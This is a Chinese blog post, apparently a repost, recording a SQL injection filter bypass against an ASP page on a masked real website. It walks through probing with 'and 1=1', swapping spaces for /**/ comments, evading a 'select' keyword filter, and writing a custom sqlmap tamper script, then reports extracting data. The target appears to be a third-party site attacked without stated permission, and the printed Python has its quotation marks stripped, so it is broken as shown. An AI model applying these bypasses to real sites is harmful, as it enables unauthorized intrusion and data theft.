码迷,mamicode.com
首页 > 数据库 > 详细

记录一次sql注入绕过

时间:2017-08-14 23:46:00      阅读:252      评论:0      收藏:0      [点我收藏+]

标签:select   like   xxx   load   net   数据   alt   and   png   

目标:http://www.xxxxx.net/temp.asp?ID=10359

通过 and 1=1 and 1=2 测试发现存在拦截

技术分享

首先想到 and 空格 = 可能存在触发规则

一般遇到这种情况 过滤 and 一般会考虑转换为 &&

空格过滤转换为 %0a 、+ 或者 /**/

= 转换为 like greatest between 这些在sqlmap 都有相应的tamper

 

这里经过测试发现就是过滤了 空格,转换为 /**/ 就不拦截了

技术分享

 

 

技术分享

由于不能进行union 注入 和报错 这里只能进行盲注

 

然后使用 sqlmap  space2comment 进行注入的时候  sqlmap出不了数据

技术分享

分析过滤了什么关键字

提交 

http://www.xxxxx.net/temp.asp?ID=10359/**/and/**/1=(select 1) 返回 

技术分享

初步判断过滤了select  

测试发现将select 转换为 /**/select  绕过过滤

 技术分享

所以要让sqlmap 能出数据就要将注入语句里面的 SELECT 全部转换为 /**/SELECT

#!/usr/bin/env python

def tamper(payload, **kwargs):
    retVal = payload
    if SELECT in retVal:
        retVal = retVal.replace(SELECT,/**/SELECT)

    return retVal

命名为 select2select 放在sqlmap tamper 目录下面

技术分享

成功注入出数据

去burp 查看语句

技术分享

 

记录一次sql注入绕过

标签:select   like   xxx   load   net   数据   alt   and   png   

原文地址:http://www.cnblogs.com/depycode/p/7360528.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!